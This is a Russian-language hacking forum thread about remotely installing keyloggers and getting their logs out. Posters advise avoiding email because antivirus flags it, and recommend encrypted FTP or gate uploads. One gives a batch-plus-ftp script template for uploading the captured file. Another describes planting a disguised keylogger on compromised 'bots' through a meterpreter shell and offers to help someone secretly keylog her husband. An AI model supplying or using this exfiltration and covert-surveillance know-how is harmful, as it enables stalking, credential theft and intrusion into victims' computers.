• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Вопрос Удалённая установка кейлоггера


rain.hf

Пользователь
Форумчанин
Регистрация
08.12.2015
Сообщения
111
Репутация
87
отправлял помню на маил-ру, у меня после этого начинался детект,
отправка на smpt как минимум не разумна почту быстро в бан загонишь , да и многие аверы ловят отправку и блокируют её так что в нынешнее время отправка на почту не катит , лучший вариант гейт или фтп там уже выбор за вами ну и естественно логи лучше шифровать .
 

Fasyuta

Пользователь
Форумчанин
Регистрация
30.04.2016
Сообщения
4
отправка на smpt как минимум не разумна почту быстро в бан загонишь , да и многие аверы ловят отправку и блокируют её так что в нынешнее время отправка на почту не катит , лучший вариант гейт или фтп там уже выбор за вами ну и естественно логи лучше шифровать .
В теме ВАЖНО - Делаем приватный кейлоггер с блекджеком и сисястой шлю*** вроде об отправке логов на почту идёт, а как настроить на отправку на гейт или ftp?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
а как настроить на отправку на гейт или ftp?
Точно не помню, если на фтп, то можно батником, примерно так:
Код:
Пишешь в файл ftp.txt (или назови как угодно):

open "адрес_ftp_сервера"
user "логин"
"пароль"
binary
put "имя_файла"
bye

Потом в *.bat пишешь: ftp -s:ftp.txt -nd.
Вроде все..

На хрюше по мойму делал как-то ! :)
 

Crazy_Proger

Пользователь
Форумчанин
Регистрация
05.03.2016
Сообщения
6
Репутация
4
А какие, интересно, антивирусы ловят отправку на мыло?
Я вот, например, когда у себя тестировал отправку на мыло, ничего не детектилось (стоит ESS 8).
Даже с помощью vbs-скрипта с обращением к нормально отправлялось в обход штатного фаервола.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174

tightend

Пользователь
Первый уровень
Регистрация
21.11.2017
Сообщения
3
Jabber
Если подключите своего бота к шеллу meterpreter, сможете заливать своего кейлоггера по вебу (с хостинга либо фтп).

ASPnet.exe - это просто благовидное название. Во избежание ненужных треволнений, потому что усеры у меня англоязычные.
Я заливаю своим ботам логгера с хостинга, логгер складывает логи в свою директорию. Можно скачивать и читать.
Все эти три (больших!) дела легко и удобно делать шеллом meterpreter (metasploit) <3
 
Последнее редактирование:

tightend

Пользователь
Первый уровень
Регистрация
21.11.2017
Сообщения
3
Jabber
Примитивный конечно кейлоггер, не то, что у вас тут - не пришлет на мыло лог, не нальет чая, не принесет в зубах тапки -, зато детектится всего несколькими породами корпоративных АВ (webroot, vipre, trendmicro). Впрочем, ими тоже через раз. Зато можно положить его всем ботам в одну директорию ("C:\Intel" на скрине выше), и meterpreter'ом скачивать пачкой со всех своих ботов.

А, ну и вдогонку - шелл претер, дает других до задницы других возможностей, он предназначен-то не просто так файлики заливать из веба на компы ^_^
 

tightend

Пользователь
Первый уровень
Регистрация
21.11.2017
Сообщения
3
Jabber
Если вы напишете, ТС, я дам вам на время сервер для шелла, может, покейлогаете вашего мужа. Или я вам покейлогаю, придумаем что-нибудь. Может, даже сочиним какую-нибудь автозагрузку обратно в веб - через schtasks или еще там как. Чтобы подключить к шеллу бота, на нем надо всего-то батник отранить. Ну, либо вместо батника длинную такую штуку в cmd скопипастить=DDD

P.S.
Ого, да тут старье мая 16 года, ёб Q_Q
 
Автор темы Похожие темы Форум Ответы Дата
NIN@ Трояны и шпионские программы 989
Верх Низ